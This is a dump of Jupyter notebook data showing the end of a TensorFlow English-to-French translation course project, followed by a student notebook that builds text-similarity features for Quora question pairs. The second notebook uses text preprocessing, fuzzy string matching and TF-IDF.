Validation Accuracy: 0.914, Loss: 0.902\nEpoch 2 Batch 508/538 - Train Accuracy: 0.940, Validation Accuracy: 0.917, Loss: 0.885\nEpoch 2 Batch 509/538 - Train Accuracy: 0.945, Validation Accuracy: 0.921, Loss: 0.935\nEpoch 2 Batch 510/538 - Train Accuracy: 0.950, Validation Accuracy: 0.931, Loss: 0.910\nEpoch 2 Batch 511/538 - Train Accuracy: 0.924, Validation Accuracy: 0.931, Loss: 0.890\nEpoch 2 Batch 512/538 - Train Accuracy: 0.939, Validation Accuracy: 0.932, Loss: 0.886\nEpoch 2 Batch 513/538 - Train Accuracy: 0.930, Validation Accuracy: 0.929, Loss: 0.882\nEpoch 2 Batch 514/538 - Train Accuracy: 0.962, Validation Accuracy: 0.935, Loss: 0.918\nEpoch 2 Batch 515/538 - Train Accuracy: 0.934, Validation Accuracy: 0.929, Loss: 0.953\nEpoch 2 Batch 516/538 - Train Accuracy: 0.930, Validation Accuracy: 0.916, Loss: 0.942\nEpoch 2 Batch 517/538 - Train Accuracy: 0.943, Validation Accuracy: 0.913, Loss: 0.887\nEpoch 2 Batch 518/538 - Train Accuracy: 0.934, Validation Accuracy: 0.915, Loss: 0.889\nEpoch 2 Batch 519/538 - Train Accuracy: 0.937, Validation Accuracy: 0.919, Loss: 0.927\nEpoch 2 Batch 520/538 - Train Accuracy: 0.933, Validation Accuracy: 0.922, Loss: 0.934\nEpoch 2 Batch 521/538 - Train Accuracy: 0.952, Validation Accuracy: 0.918, Loss: 0.913\nEpoch 2 Batch 522/538 - Train Accuracy: 0.929, Validation Accuracy: 0.923, Loss: 0.901\nEpoch 2 Batch 523/538 - Train Accuracy: 0.936, Validation Accuracy: 0.921, Loss: 0.918\nEpoch 2 Batch 524/538 - Train Accuracy: 0.941, Validation Accuracy: 0.924, Loss: 0.923\nEpoch 2 Batch 525/538 - Train Accuracy: 0.940, Validation Accuracy: 0.922, Loss: 0.913\nEpoch 2 Batch 526/538 - Train Accuracy: 0.939, Validation Accuracy: 0.929, Loss: 0.893\nEpoch 2 Batch 527/538 - Train Accuracy: 0.947, Validation Accuracy: 0.930, Loss: 0.902\nEpoch 2 Batch 528/538 - Train Accuracy: 0.938, Validation Accuracy: 0.935, Loss: 0.891\nEpoch 2 Batch 529/538 - Train Accuracy: 0.929, Validation Accuracy: 0.936, Loss: 0.902\nEpoch 2 Batch 530/538 - Train Accuracy: 0.925, Validation Accuracy: 0.940, Loss: 0.932\nEpoch 2 Batch 531/538 - Train Accuracy: 0.941, Validation Accuracy: 0.944, Loss: 0.898\nEpoch 2 Batch 532/538 - Train Accuracy: 0.936, Validation Accuracy: 0.932, Loss: 0.899\nEpoch 2 Batch 533/538 - Train Accuracy: 0.942, Validation Accuracy: 0.934, Loss: 0.876\nEpoch 2 Batch 534/538 - Train Accuracy: 0.945, Validation Accuracy: 0.937, Loss: 0.888\nEpoch 2 Batch 535/538 - Train Accuracy: 0.953, Validation Accuracy: 0.934, Loss: 0.875\nEpoch 2 Batch 536/538 - Train Accuracy: 0.941, Validation Accuracy: 0.938, Loss: 0.942\nModel Trained and Saved\n"
]
],
[
[
"### Save Parameters\nSave the `batch_size` and `save_path` parameters for inference.",
"_____no_output_____"
]
],
[
[
"\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\n# Save parameters for checkpoint\nhelper.save_params(save_path)",
"_____no_output_____"
]
],
[
[
"# Checkpoint",
"_____no_output_____"
]
],
[
[
"\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nimport helper\nimport problem_unittests as tests\n\n_, (source_vocab_to_int, target_vocab_to_int), (source_int_to_vocab, target_int_to_vocab) = helper.load_preprocess()\nload_path = helper.load_params()",
"_____no_output_____"
]
],
[
[
"## Sentence to Sequence\nTo feed a sentence into the model for translation, you first need to preprocess it. Implement the function `sentence_to_seq()` to preprocess new sentences.\n\n- Convert the sentence to lowercase\n- Convert words into ids using `vocab_to_int`\n- Convert words not in the vocabulary, to the `<UNK>` word id.",
"_____no_output_____"
]
],
[
[
"def sentence_to_seq(sentence, vocab_to_int):\n \"\"\"\n Convert a sentence to a sequence of ids\n :param sentence: String\n :param vocab_to_int: Dictionary to go from the words to an id\n :return: List of word ids\n \"\"\"\n # TODO: Implement Function\n word_ids = []\n words = sentence.lower().split()\n for l in words:\n if l in vocab_to_int:\n word_ids.append(vocab_to_int[l])\n else:\n word_ids.append(vocab_to_int['<UNK>'])\n\n return word_ids\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_sentence_to_seq(sentence_to_seq)",
"Tests Passed\n"
]
],
[
[
"## Translate\nThis will translate `translate_sentence` from English to French.",
"_____no_output_____"
]
],
[
[
"translate_sentence = 'he saw a old yellow truck .'\n\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\ntranslate_sentence = sentence_to_seq(translate_sentence, source_vocab_to_int)\n\nloaded_graph = tf.Graph()\nwith tf.Session(graph=loaded_graph) as sess:\n # Load saved model\n loader = tf.train.import_meta_graph(load_path + '.meta')\n loader.restore(sess, load_path)\n\n input_data = loaded_graph.get_tensor_by_name('input:0')\n logits = loaded_graph.get_tensor_by_name('logits:0')\n keep_prob = loaded_graph.get_tensor_by_name('keep_prob:0')\n\n translate_logits = sess.run(logits, {input_data: [translate_sentence], keep_prob: 1.0})[0]\n\nprint('Input')\nprint(' Word Ids: {}'.format([i for i in translate_sentence]))\nprint(' English Words: {}'.format([source_int_to_vocab[i] for i in translate_sentence]))\n\nprint('\\nPrediction')\nprint(' Word Ids: {}'.format([i for i in np.argmax(translate_logits, 1)]))\nprint(' French Words: {}'.format([target_int_to_vocab[i] for i in np.argmax(translate_logits, 1)]))",
"Input\n Word Ids: [192, 171, 197, 79, 99, 229, 206]\n English Words: ['he', 'saw', 'a', 'old', 'yellow', 'truck', '.']\n\nPrediction\n Word Ids: [5, 348, 82, 215, 100, 218, 175, 180, 1]\n French Words: ['il', 'a', 'vu', 'un', 'vieux', 'camion', 'jaune', '.', '<EOS>']\n"
]
],
[
[
"## Imperfect Translation\nYou might notice that some sentences translate better than others. Since the dataset you're using only has a vocabulary of 227 English words of the thousands that you use, you're only going to see good results using these words. Additionally, the translations in this data set were made by Google translate, so the translations themselves aren't particularly good. (We apologize to the French speakers out there!) Thankfully, for this project, you don't need a perfect translation. However, if you want to create a better translation model, you'll need better data.\n\nYou can train on the [WMT10 French-English corpus](http://www.statmt.org/wmt10/training-giga-fren.tar). This dataset has more vocabulary and richer in topics discussed. However, this will take you days to train, so make sure you've a GPU and the neural network is performing well on dataset we provided. Just make sure you play with the WMT10 corpus after you've submitted this project.\n## Submitting This Project\nWhen submitting this project, make sure to run all the cells before saving the notebook. Save the notebook file as \"dlnd_language_translation.ipynb\" and save it as a HTML file under \"File\" -> \"Download as\". Include the \"helper.py\" and \"problem_unittests.py\" files in your submission.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
e705e04912af3621e8976d52ca667f60976a5f6e | 55,710 | ipynb | Jupyter Notebook | Source Codes/Model Explaination.ipynb | luajunan/CS3244-Quora-Semantics-Project | bb3dfa0ee8938469e4fdd298205a0cafa15efa32 | [
"MIT"
] | 2 | 2021-12-15T06:47:50.000Z | 2021-12-15T06:48:22.000Z | Source Codes/Model Explaination.ipynb | luajunan/CS3244-Quora-Semantics-Project | bb3dfa0ee8938469e4fdd298205a0cafa15efa32 | [
"MIT"
] | null | null | null | Source Codes/Model Explaination.ipynb | luajunan/CS3244-Quora-Semantics-Project | bb3dfa0ee8938469e4fdd298205a0cafa15efa32 | [
"MIT"
] | 3 | 2021-12-03T11:02:48.000Z | 2021-12-15T06:48:40.000Z | 55,710 | 55,710 | 0.610088 | [
[
[
"# Colab for Feature Engineering. #\n\n---\n\n\n## To Do: ##\n1. Separate the Duplicates and Non-Duplicates\n2. Copy the DataFrames into new variables\n3. Process the data into the feature to be extracted\n4. Plot the Histogram to see to observe the distribution\n\n\n---\n\n\n##Features##\n\n1. Number of unique words which occur in q1 and q2 \n2. Ratio of common words / total words (q1+q2)\n2. Common Word Ratio min ( words common/ min(len(q1), len(q2)))\n2. Common Word Ratio mmax ( words common/ max(len(q1), len(q2)))\n2. Common Stop Words min ( common stopwords/ min(len(q1), len(q2)))\n2. Common Stop Words max ( common stopwords/ max(len(q1), len(q2)))\n2. Common Tokens min ( common Tokens / min(len(q1), len(q2)))\n2. Common Tokens max ( common Tokens / max(len(q1), len(q2)))\n2. Common Adjectives min ( common adjectives /min(len(q1), len(q2)))\n2. Common Adjectives max ( common adjectives /max(len(q1), len(q2)))\n2. Common Noun min ( common nouns / min(len(q1), len(q2)))\n2. Common Noun max ( common nouns / max(len(q1), len(q2)))\n2. Fuzz ratio\n2. Fuzz partial ratio \n2. Fuzz Token Sort Ratio \n2. Fuzz Token Set Ratio\n2. Mean Length of 2 questions\n2. Ratio of Length of Questions ( len(q1) / len(q2) )\n2. Absolute Length Difference (| len(q1) - len(q2) |\n2. Longest Matching Substring min ( longest substring/min(len(q1), len(q2)))\n2. Longest Matching Substring max ( longest substring/max(len(q1), len(q2)))\n\n",
"_____no_output_____"
],
[
"Download your required libraries here",
"_____no_output_____"
]
],
[
[
"!pip install bs4\n!pip install fuzzywuzzy\n!pip install TextBlob\n!pip install pickle5\n!python -m spacy download en_core_web_lg\n!pip install keras==2.6.0",
"Requirement already satisfied: bs4 in /usr/local/lib/python3.7/dist-packages (0.0.1)\nRequirement already satisfied: beautifulsoup4 in /usr/local/lib/python3.7/dist-packages (from bs4) (4.6.3)\nCollecting fuzzywuzzy\n Downloading fuzzywuzzy-0.18.0-py2.py3-none-any.whl (18 kB)\nInstalling collected packages: fuzzywuzzy\nSuccessfully installed fuzzywuzzy-0.18.0\nRequirement already satisfied: TextBlob in /usr/local/lib/python3.7/dist-packages (0.15.3)\nRequirement already satisfied: nltk>=3.1 in /usr/local/lib/python3.7/dist-packages (from TextBlob) (3.2.5)\nRequirement already satisfied: six in /usr/local/lib/python3.7/dist-packages (from nltk>=3.1->TextBlob) (1.15.0)\nCollecting pickle5\n Downloading pickle5-0.0.12-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl (256 kB)\n\u001b[K |████████████████████████████████| 256 kB 12.6 MB/s \n\u001b[?25hInstalling collected packages: pickle5\nSuccessfully installed pickle5-0.0.12\nCollecting en_core_web_lg==2.2.5\n Downloading https://github.com/explosion/spacy-models/releases/download/en_core_web_lg-2.2.5/en_core_web_lg-2.2.5.tar.gz (827.9 MB)\n\u001b[K |████████████████████████████████| 827.9 MB 1.2 MB/s \n\u001b[?25hRequirement already satisfied: spacy>=2.2.2 in /usr/local/lib/python3.7/dist-packages (from en_core_web_lg==2.2.5) (2.2.4)\nRequirement already satisfied: cymem<2.1.0,>=2.0.2 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (2.0.6)\nRequirement already satisfied: wasabi<1.1.0,>=0.4.0 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (0.8.2)\nRequirement already satisfied: tqdm<5.0.0,>=4.38.0 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (4.62.3)\nRequirement already satisfied: catalogue<1.1.0,>=0.0.7 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (1.0.0)\nRequirement already satisfied: blis<0.5.0,>=0.4.0 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (0.4.1)\nRequirement already satisfied: setuptools in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (57.4.0)\nRequirement already satisfied: murmurhash<1.1.0,>=0.28.0 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (1.0.6)\nRequirement already satisfied: thinc==7.4.0 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (7.4.0)\nRequirement already satisfied: requests<3.0.0,>=2.13.0 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (2.23.0)\nRequirement already satisfied: numpy>=1.15.0 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (1.19.5)\nRequirement already satisfied: srsly<1.1.0,>=1.0.2 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (1.0.5)\nRequirement already satisfied: preshed<3.1.0,>=3.0.2 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (3.0.6)\nRequirement already satisfied: plac<1.2.0,>=0.9.6 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (1.1.3)\nRequirement already satisfied: importlib-metadata>=0.20 in /usr/local/lib/python3.7/dist-packages (from catalogue<1.1.0,>=0.0.7->spacy>=2.2.2->en_core_web_lg==2.2.5) (4.8.2)\nRequirement already satisfied: zipp>=0.5 in /usr/local/lib/python3.7/dist-packages (from importlib-metadata>=0.20->catalogue<1.1.0,>=0.0.7->spacy>=2.2.2->en_core_web_lg==2.2.5) (3.6.0)\nRequirement already satisfied: typing-extensions>=3.6.4 in /usr/local/lib/python3.7/dist-packages (from importlib-metadata>=0.20->catalogue<1.1.0,>=0.0.7->spacy>=2.2.2->en_core_web_lg==2.2.5) (3.10.0.2)\nRequirement already satisfied: urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0,>=2.13.0->spacy>=2.2.2->en_core_web_lg==2.2.5) (1.24.3)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0,>=2.13.0->spacy>=2.2.2->en_core_web_lg==2.2.5) (2021.10.8)\nRequirement already satisfied: chardet<4,>=3.0.2 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0,>=2.13.0->spacy>=2.2.2->en_core_web_lg==2.2.5) (3.0.4)\nRequirement already satisfied: idna<3,>=2.5 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0,>=2.13.0->spacy>=2.2.2->en_core_web_lg==2.2.5) (2.10)\nBuilding wheels for collected packages: en-core-web-lg\n Building wheel for en-core-web-lg (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for en-core-web-lg: filename=en_core_web_lg-2.2.5-py3-none-any.whl size=829180942 sha256=9d50f1c826803fde486e554edc26b13f7b47017066850fc05b27e8336cc8f61c\n Stored in directory: /tmp/pip-ephem-wheel-cache-adgdwep5/wheels/11/95/ba/2c36cc368c0bd339b44a791c2c1881a1fb714b78c29a4cb8f5\nSuccessfully built en-core-web-lg\nInstalling collected packages: en-core-web-lg\nSuccessfully installed en-core-web-lg-2.2.5\n\u001b[38;5;2m✔ Download and installation successful\u001b[0m\nYou can now load the model via spacy.load('en_core_web_lg')\nCollecting keras==2.6.0\n Downloading keras-2.6.0-py2.py3-none-any.whl (1.3 MB)\n\u001b[K |████████████████████████████████| 1.3 MB 11.9 MB/s \n\u001b[?25hInstalling collected packages: keras\n Attempting uninstall: keras\n Found existing installation: keras 2.7.0\n Uninstalling keras-2.7.0:\n Successfully uninstalled keras-2.7.0\n\u001b[31mERROR: pip's dependency resolver does not currently take into account all the packages that are installed. This behaviour is the source of the following dependency conflicts.\ntensorflow 2.7.0 requires keras<2.8,>=2.7.0rc0, but you have keras 2.6.0 which is incompatible.\u001b[0m\nSuccessfully installed keras-2.6.0\n"
]
],
[
[
"Import your required libraries here",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport numpy as np\nimport re\nfrom bs4 import BeautifulSoup\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom keras.preprocessing.text import Tokenizer\nimport nltk\nfrom fuzzywuzzy import fuzz\nfrom difflib import SequenceMatcher #For finding longest substring\nfrom textblob import TextBlob\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport spacy\nimport en_core_web_lg\nimport pickle5\nfrom keras.models import load_model\nfrom keras import backend as K\nfrom keras.preprocessing.sequence import pad_sequences\nnlp = spacy.load('en_core_web_lg')\nnltk.download('punkt')\nnltk.download('stopwords')\nnltk.download('averaged_perceptron_tagger') # for pos tagging\nfrom tqdm import tqdm_notebook\nfrom scipy.spatial.distance import cosine\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import precision_score, confusion_matrix",
"/usr/local/lib/python3.7/dist-packages/fuzzywuzzy/fuzz.py:11: UserWarning: Using slow pure-python SequenceMatcher. Install python-Levenshtein to remove this warning\n warnings.warn('Using slow pure-python SequenceMatcher. Install python-Levenshtein to remove this warning')\n"
]
],
[
[
"Mounting the dataset onto this google colab",
"_____no_output_____"
]
],
[
[
"from google.colab import drive\ndrive.mount('/content/drive')\n%cd \"/content/drive/MyDrive/CS3244 45 Project/RNN Models\"",
"Mounted at /content/drive\n/content/drive/.shortcut-targets-by-id/1ixE_YVbTLblbUJgpPcDWfO-zlQeoNGq4/CS3244 45 Project/RNN Models\n"
],
[
"#Loading the tokenizer\nwith open('../tokenizer.pickle', 'rb') as saved_tokenizer:\n tokenizer = pickle5.load(saved_tokenizer)\n\ndef exponent_neg_manhattan_distance(left, right):\n return K.exp(-K.sum(K.abs(left-right), axis=1, keepdims=True))\n\nmodel = load_model('ys.h5')",
"WARNING:tensorflow:Layer lstm will not use cuDNN kernels since it doesn't meet the criteria. It will use a generic GPU kernel as fallback when running on GPU.\n"
],
[
"model_initial = load_model('baseline_3')",
"_____no_output_____"
]
],
[
[
"##**Preprocess the questions**",
"_____no_output_____"
]
],
[
[
"# This function accepts a question and preprocesses it. Returns cleaned question.\n# This section of code was referenced from Sourab Vadlamani in his work \"Quora Question Pairs Similairty, Tackling a real life NLP problem\"\n# https://towardsdatascience.com/quora-question-pairs-similarity-tackling-a-real-life-nlp-problem-ab55c5da2e84\n\ndef preprocess(q):\n # Firstly, we convert to lowercase and remove trailing and leading spaces\n q = str(q).lower().strip()\n\n # Replace certain special characters with their string equivalents\n q = q.replace('%', ' percent')\n q = q.replace('$', ' dollar ')\n q = q.replace('₹', ' rupee ')\n q = q.replace('€', ' euro ')\n q = q.replace('@', ' at ')\n\n # The pattern '[math]' appears around 900 times in the whole dataset.\n q = q.replace('[math]', '')\n\n # Replacing some numbers with string equivalents (not perfect, can be done better to account for more cases)\n q = q.replace(',000,000,000 ', 'b ')\n q = q.replace(',000,000 ', 'm ')\n q = q.replace(',000 ', 'k ')\n q = re.sub(r'([0-9]+)000000000', r'\\1b', q)\n q = re.sub(r'([0-9]+)000000', r'\\1m', q)\n q = re.sub(r'([0-9]+)000', r'\\1k', q)\n\n # Decontracting words\n # https://en.wikipedia.org/wiki/Wikipedia%3aList_of_English_contractions\n # https://stackoverflow.com/a/19794953\n contractions = { \n \"ain't\": \"am not\",\n \"aren't\": \"are not\",\n \"can't\": \"can not\",\n \"can't've\": \"can not have\",\n \"'cause\": \"because\",\n \"could've\": \"could have\",\n \"couldn't\": \"could not\",\n \"couldn't've\": \"could not have\",\n \"didn't\": \"did not\",\n \"doesn't\": \"does not\",\n \"don't\": \"do not\",\n \"hadn't\": \"had not\",\n \"hadn't've\": \"had not have\",\n \"hasn't\": \"has not\",\n \"haven't\": \"have not\",\n \"he'd\": \"he would\",\n \"he'd've\": \"he would have\",\n \"he'll\": \"he will\",\n \"he'll've\": \"he will have\",\n \"he's\": \"he is\",\n \"how'd\": \"how did\",\n \"how'd'y\": \"how do you\",\n \"how'll\": \"how will\",\n \"how's\": \"how is\",\n \"i'd\": \"i would\",\n \"i'd've\": \"i would have\",\n \"i'll\": \"i will\",\n \"i'll've\": \"i will have\",\n \"i'm\": \"i am\",\n \"i've\": \"i have\",\n \"isn't\": \"is not\",\n \"it'd\": \"it would\",\n \"it'd've\": \"it would have\",\n \"it'll\": \"it will\",\n \"it'll've\": \"it will have\",\n \"it's\": \"it is\",\n \"let's\": \"let us\",\n \"ma'am\": \"madam\",\n \"mayn't\": \"may not\",\n \"might've\": \"might have\",\n \"mightn't\": \"might not\",\n \"mightn't've\": \"might not have\",\n \"must've\": \"must have\",\n \"mustn't\": \"must not\",\n \"mustn't've\": \"must not have\",\n \"needn't\": \"need not\",\n \"needn't've\": \"need not have\",\n \"o'clock\": \"of the clock\",\n \"oughtn't\": \"ought not\",\n \"oughtn't've\": \"ought not have\",\n \"shan't\": \"shall not\",\n \"sha'n't\": \"shall not\",\n \"shan't've\": \"shall not have\",\n \"she'd\": \"she would\",\n \"she'd've\": \"she would have\",\n \"she'll\": \"she will\",\n \"she'll've\": \"she will have\",\n \"she's\": \"she is\",\n \"should've\": \"should have\",\n \"shouldn't\": \"should not\",\n \"shouldn't've\": \"should not have\",\n \"so've\": \"so have\",\n \"so's\": \"so as\",\n \"that'd\": \"that would\",\n \"that'd've\": \"that would have\",\n \"that's\": \"that is\",\n \"there'd\": \"there would\",\n \"there'd've\": \"there would have\",\n \"there's\": \"there is\",\n \"they'd\": \"they would\",\n \"they'd've\": \"they would have\",\n \"they'll\": \"they will\",\n \"they'll've\": \"they will have\",\n \"they're\": \"they are\",\n \"they've\": \"they have\",\n \"to've\": \"to have\",\n \"wasn't\": \"was not\",\n \"we'd\": \"we would\",\n \"we'd've\": \"we would have\",\n \"we'll\": \"we will\",\n \"we'll've\": \"we will have\",\n \"we're\": \"we are\",\n \"we've\": \"we have\",\n \"weren't\": \"were not\",\n \"what'll\": \"what will\",\n \"what'll've\": \"what will have\",\n \"what're\": \"what are\",\n \"what's\": \"what is\",\n \"what've\": \"what have\",\n \"when's\": \"when is\",\n \"when've\": \"when have\",\n \"where'd\": \"where did\",\n \"where's\": \"where is\",\n \"where've\": \"where have\",\n \"who'll\": \"who will\",\n \"who'll've\": \"who will have\",\n \"who's\": \"who is\",\n \"who've\": \"who have\",\n \"why's\": \"why is\",\n \"why've\": \"why have\",\n \"will've\": \"will have\",\n \"won't\": \"will not\",\n \"won't've\": \"will not have\",\n \"would've\": \"would have\",\n \"wouldn't\": \"would not\",\n \"wouldn't've\": \"would not have\",\n \"y'all\": \"you all\",\n \"y'all'd\": \"you all would\",\n \"y'all'd've\": \"you all would have\",\n \"y'all're\": \"you all are\",\n \"y'all've\": \"you all have\",\n \"you'd\": \"you would\",\n \"you'd've\": \"you would have\",\n \"you'll\": \"you will\",\n \"you'll've\": \"you will have\",\n \"you're\": \"you are\",\n \"you've\": \"you have\"\n }\n\n q_decontracted = []\n\n for word in q.split():\n if word in contractions:\n word = contractions[word]\n \n q_decontracted.append(word)\n\n q = ' '.join(q_decontracted)\n q = q.replace(\"'ve\", \" have\")\n q = q.replace(\"n't\", \" not\")\n q = q.replace(\"'re\", \" are\")\n q = q.replace(\"'ll\", \" will\")\n\n # Removing HTML tags\n q = BeautifulSoup(q)\n q = q.get_text()\n\n # Remove punctuations\n pattern = re.compile('\\W')\n q = re.sub(pattern, ' ', q).strip()\n\n return q",
"_____no_output_____"
]
],
[
[
"##**Jun An**\n\n1. Ratio of Common Words (Common words / total words) (Done)\n2. Ratio of Common Tokens (Common tokens/ max(q1, q2)) (Done)\n3. Fuzz partial ratio (Done)\n4. Longest Matching Substring Min (Done)",
"_____no_output_____"
]
],
[
[
"def num_common_words_ratio(row):\n set1 = set(row['question1'].lower().split())\n set2 = set(row['question2'].lower().split())\n total = len(set1) + len(set2)\n return len(set1.intersection(set2))/total",
"_____no_output_____"
],
[
"def common_tokens_ratio_max(row):\n q1 = set(word_tokenize(row['question1'].lower()))\n q2 = set(word_tokenize(row['question2'].lower()))\n stop_words = set(stopwords.words('english'))\n token1 = [word for word in q1 if word not in stop_words]\n token2 = [word for word in q2 if word not in stop_words]\n ratio = len(set(token1).intersection(set(token2))) / max(len(row['question1']), len(row['question2']))\n\n return ratio\n",
"_____no_output_____"
],
[
"def fuzz_partial_ratio(row):\n q1 = row['question1']\n q2 = row['question2']\n fuzz_partial = fuzz.partial_ratio(q1,q2)\n return fuzz_partial",
"_____no_output_____"
],
[
"def min_longest_substring(row):\n q1 = row['question1']\n q2 = row['question2']\n match = SequenceMatcher(None, q1, q2).find_longest_match(0, len(q1), 0, len(q2))\n return match.size/min(len(q1), len(q2))",
"_____no_output_____"
]
],
[
[
"##**Penn Han**\n\n1. Number of unique words that occur in q1 and q2\n2. Ratio of Common Tokens to min(len(q1), len(q2))\n3. Fuzz Ratio\n4. Absolute Length Difference between q1 and q2\n5. Mean TF-IDF value\n6. Mean IDF-weighted vector",
"_____no_output_____"
]
],
[
[
"def unique_words_count(row):\n set1 = set(row['question1'].lower().split())\n set2 = set(row['question2'].lower().split())\n return len(set1.intersection(set2))",
"_____no_output_____"
],
[
"def common_token_ratio_min(row):\n q1 = set(word_tokenize(row['question1'].lower()))\n q2 = set(word_tokenize(row['question2'].lower()))\n stop_words = set(stopwords.words('english'))\n token1 = [word for word in q1 if word not in stop_words]\n token2 = [word for word in q2 if word not in stop_words]\n ratio = len(set(token1).intersection(set(token2))) / min(len(row['question1']), len(row['question2']))\n return ratio",
"_____no_output_____"
],
[
"def fuzz_ratio(row):\n q1 = row['question1']\n q2 = row['question2']\n fuzz_ratio = fuzz.ratio(q1,q2)\n return fuzz_ratio",
"_____no_output_____"
],
[
"def abs_len_difference(row):\n q1 = row['question1']\n q2 = row['question2']\n abs_len_diff = abs(len(q1) - len(q2))\n return abs_len_diff",
"_____no_output_____"
],
[
"#Stop words not removed PLEASE ONLY USE EITHER THIS OR THE BELOW, NOT BOTH\n\n#tf_idf_vectoriser = TfidfVectorizer(lowercase=True)\n#q1_train_list = list(train_set['question1'])\n#q2_train_list = list(train_set['question2'])\n#question_corpus = list(q1_train_list + q2_train_list)\n#tf_idf_vectoriser.fit(question_corpus)\n#idf = dict(zip(tf_idf_vectoriser.get_feature_names(), tf_idf_vectoriser.idf_)) #For Weighted W2V\n#nlp = en_core_web_lg.load()",
"_____no_output_____"
],
[
"def mean_tfidf_value_q1(row):\n q1 = word_tokenize(row['question1'].lower())\n stop_words = set(stopwords.words('english'))\n token1 = [word for word in q1 if word not in stop_words]\n if len(token1) > 0:\n q1_vector_matrix = tf_idf_vectoriser.transform(token1) #Transform must take in a iterable so [str]\n return q1_vector_matrix #Returns a sparse matrix\n else:\n return 0",
"_____no_output_____"
],
[
"def mean_tfidf_value_q2(row):\n q2 = set(word_tokenize(row['question2'].lower()))\n stop_words = set(stopwords.words('english'))\n token2 = [word for word in q1 if word not in stop_words]\n if len(token1) > 0:\n q2_vector_matrix = tf_idf_vectoriser.transform(token2) #Transform must take in a iterable so [str]\n return q2_vector_matrix #Returns a sparse matrix\n else:\n return 0",
"_____no_output_____"
],
[
"def calculate_weighted_vector(question):\n weighted_vectors = []\n doc = nlp(question)\n mean_vec = np.zeros((len(doc[0].vector)))\n for word in doc:\n vector = word.vector\n if str(word) in idf:\n idf_weight = idf[str(word)]\n else:\n idf_weight = 0\n mean_vec += vector * idf_weight\n mean_vec /= len(doc)\n return mean_vec",
"_____no_output_____"
],
[
"def mean_idfweighted_vector_q1(row):\n idfweighted_vector_q1 = calculate_weighted_vector(row['question1'])\n return idfweighted_vector_q1",
"_____no_output_____"
],
[
"def mean_idfweighted_vector_q2(row):\n idfweighted_vector_q2 = calculate_weighted_vector(row['question2'])\n return idfweighted_vector_q2",
"_____no_output_____"
],
[
"#train_set[\"tfidf_matrix_q1\"] = train_set.apply(mean_tfidf_value_q1, axis=1)\n#train_set[\"tfidf_matrix_q2\"] = train_set.apply(mean_tfidf_value_q2, axis=1)\n#train_set[\"mean_idfweighted_vector_q1\"] = train_set.apply(mean_idfweighted_vector_q1, axis=1)\n#train_set[\"mean_idfweighted_vector_q2\"] = train_set.apply(mean_idfweighted_vector_q2, axis=1)",
"_____no_output_____"
]
],
[
[
"## Jeremy\n1. common stop words min\n2. common noun min\n3. mean length of 2 questions",
"_____no_output_____"
]
],
[
[
"stop_words = set(stopwords.words('english'))",
"_____no_output_____"
],
[
"def get_min_len_qn(row):\n return min(len(row['question1'].split()), len(row['question2'].split()))",
"_____no_output_____"
],
[
